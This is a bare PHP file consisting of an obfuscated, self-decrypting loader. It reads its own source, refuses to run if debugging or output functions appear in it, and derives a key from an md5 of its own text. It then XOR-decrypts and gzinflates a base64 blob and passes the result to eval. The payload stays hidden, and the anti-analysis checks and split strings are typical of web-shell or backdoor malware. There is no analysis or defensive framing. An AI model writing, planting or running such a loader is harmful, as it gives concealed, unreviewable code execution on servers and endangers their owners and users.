<?php
$iceevnujqro="f95feaf60f9fb97ad80b4f666db7b6fb";
$stxrjza="5e0157025707075707040a54005c5359515a0857065507000100010f06005051";
$lvjurkod="i48x1PtW09KG1Wa67bI0F3tMcnj/GOd9GytPck3g/X51ca5NZLE10YDR4jVINtSJGqoQZfp/YuZnKK4VTJ/iY7mQ7qsar6yw49YxGDZl/b0Zbik223j8H3nhSxGkU1VtRgTowTcW3Bge+1rkYg==";
$kozmgotsupqu=file_get_contents(__FILE__);
$fyimostvh=str_replace($lvjurkod,"",$kozmgotsupqu);
if(strpos($fyimostvh,"ec"."ho")!==false||strpos($fyimostvh,"pr"."int")!==false||strpos($fyimostvh,"var_"."dump")!==false||strpos($fyimostvh,"file_put_"."contents")!==false||strpos($fyimostvh,"fw"."rite")!==false){die();}
$fkhboywxue=str_replace(array($iceevnujqro,$stxrjza),array("SP_268748ad","KP_30bcf42f"),$kozmgotsupqu);
$bjqezv=md5($fkhboywxue);
$gdsaerbhjvvt=hex2bin($stxrjza);
$rjomnnpreeba="";
$ljrufkmct=strlen($bjqezv);
for($kkcgnpdkzvri=0;$kkcgnpdkzvri<$ljrufkmct;$kkcgnpdkzvri++){
    $rjomnnpreeba.=chr(ord($gdsaerbhjvvt[$kkcgnpdkzvri])^ord($bjqezv[$kkcgnpdkzvri]));
}
$rgqlzmvo=base64_decode($lvjurkod);
$fabnbndon=strlen($rgqlzmvo);
$orcfhdqvumq="";
$rnxunzntv=strlen($rjomnnpreeba);
for($kkcgnpdkzvri=0;$kkcgnpdkzvri<$fabnbndon;$kkcgnpdkzvri++){
    $orcfhdqvumq.=$rgqlzmvo[$kkcgnpdkzvri]^$rjomnnpreeba[$kkcgnpdkzvri%$rnxunzntv];
}
$ceymzfhyu="gz"."in"."fl"."ate";
eval($ceymzfhyu($orcfhdqvumq));
